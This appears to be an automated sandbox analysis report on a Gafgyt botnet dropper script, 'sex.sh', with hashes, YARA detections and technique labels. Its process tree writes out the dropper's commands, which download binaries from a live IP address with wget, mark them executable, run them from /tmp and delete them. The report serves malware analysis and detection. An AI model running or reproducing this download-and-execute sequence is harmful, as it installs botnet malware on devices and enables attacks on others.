Analysis
-
max time kernel
9s -
max time network
12s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
02-01-2025 21:56
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
sex.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
c393be1bb1bbee668b95b671620d63c0
-
SHA1
cce8f8abadfd7e5b74d20a8bce40468662e3ffa9
-
SHA256
cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7
-
SHA512
9bfc5bf1c69d34605942daa875afebd493047c715009639302aac56256abfe6619ba37715dcb493f137329517181c7d3ebbcfb1395ad5ac3ae7bec360c20f721
Malware Config
Signatures
-
Detected Gafgyt variant 5 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_gafgyt behavioral2/files/fstream-2.dat family_gafgyt behavioral2/files/fstream-3.dat family_gafgyt behavioral2/files/fstream-4.dat family_gafgyt behavioral2/files/fstream-5.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 7 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 728 chmod 681 chmod 695 chmod 704 chmod 712 chmod 717 chmod 724 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/mips 683 mips /tmp/mipsel 696 mipsel /tmp/sh4 705 sh4 /tmp/arm61 718 arm61 /tmp/ppc 729 ppc -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 718 arm61 -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 683 mips 686 rm 688 wget 696 mipsel 698 rm 670 wget -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ppc wget File opened for modification /tmp/mips wget File opened for modification /tmp/mipsel wget File opened for modification /tmp/sh4 wget File opened for modification /tmp/arm61 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:666
-
/usr/bin/wgetwget http://31.13.224.110/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:670
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/mips./mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:683
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:686
-
-
/usr/bin/wgetwget http://31.13.224.110/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:688
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/mipsel./mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:696
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:698
-
-
/usr/bin/wgetwget http://31.13.224.110/sh42⤵
- Writes file to tmp directory
PID:700
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
PID:704
-
-
/tmp/sh4./sh42⤵
- Executes dropped EXE
PID:705
-
-
/bin/rmrm -rf sh42⤵PID:709
-
-
/usr/bin/wgetwget http://31.13.224.110/x862⤵PID:710
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/x86./x862⤵PID:713
-
-
/bin/rmrm -rf x862⤵PID:714
-
-
/usr/bin/wgetwget http://31.13.224.110/arm612⤵
- Writes file to tmp directory
PID:716
-
-
/bin/chmodchmod +x arm612⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
- Changes its process name
PID:718
-
-
/bin/rmrm -rf arm612⤵PID:721
-
-
/usr/bin/wgetwget http://31.13.224.110/i6862⤵PID:723
-
-
/bin/chmodchmod +x i6862⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/i686./i6862⤵PID:725
-
-
/bin/rmrm -rf i6862⤵PID:726
-
-
/usr/bin/wgetwget http://31.13.224.110/ppc2⤵
- Writes file to tmp directory
PID:727
-
-
/bin/chmodchmod +x ppc2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/ppc./ppc2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm -rf ppc2⤵PID:731
-
-
/usr/bin/wgetwget http://31.13.224.110/5862⤵PID:732
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
MD5cc2c559dcf0b6b8a969dfe141afcb8a7
SHA19a51751c74638501f9bc94ee0070d61fb8c952c3
SHA256fbafa6393f825b6da94ea2b5517d759ff46564f563dba155f17a277683d75e1c
SHA512aba1ad2c7d1e51c3c98d2704e58e92accff328df23dfa0b2a219fd8e3775af8ba2e93157765da943f1c49721ecba6340fb46691112deb841a9cafc0f4a10432b
-
Filesize
148KB
MD5dce29bdff1efd8b56470beb84800f340
SHA129744f0f8a1bfb02606d00b5eafd029b6006e9aa
SHA256ff80f728ab5574dd193e529d4cb4c5a062d7f57bea0de856722f6373e0235d60
SHA512967c004b6341f97572cef3aba4baf5b5346aaa4c8d9731a21c8dfd9994d9f65895f8946235f7103f51888a442827f8b3675642686167cb99d5062f4d3cbcd651
-
Filesize
148KB
MD5085aaca192395078f3266ad40ca3820e
SHA1391c2a7bbd936e9de7c33ff8c31858a4a120fa54
SHA25689ef04dea955b2724b47529801174a1a00b0533db594178efbb5888d37a87474
SHA51215e98139c7bc0551bf6eb5dbdb07b5de07fe01b3e4a5ace72918adb1e36e071d0d3e606a8019c58e1275f4e57f2b0ece8dbdd58de4cb5f9f30512013fea6db0e
-
Filesize
110KB
MD501a92f4cda4ed8855ba45ade51ee70b2
SHA1a6b61a2b34500929b548657556c29d91896d0a08
SHA2560c82739271f51c1040662ebc13805a749ac51c44e5355d60fb9fe1764efa2415
SHA512cf44cacfcd1d0361757b4216334bdd3e9d5b8045ec48303c2e191cfc2fb8807744a0b382b078ad3225ae3c36f2d168aa4aa2abeebc58d9a30ed2882b6807506e
-
Filesize
105KB
MD5488d96eefc3e512cad6dbf9ead797b9d
SHA1dc2352927d0928b2de6304bc1fd81332f35eebf4
SHA256e4bbb9fb66fc81dd445f598147810ea8d76eb4799a79561403c0902bb192ad45
SHA5129b9ae7893c692c3ffb679b47e2fcac3e3334d3f590ae026bf7c10122586a2a5e400a19ce4e414a4afe6f10da61dc2bbd0a14686cd48d6ea2d5e90d7a8bbe2ef9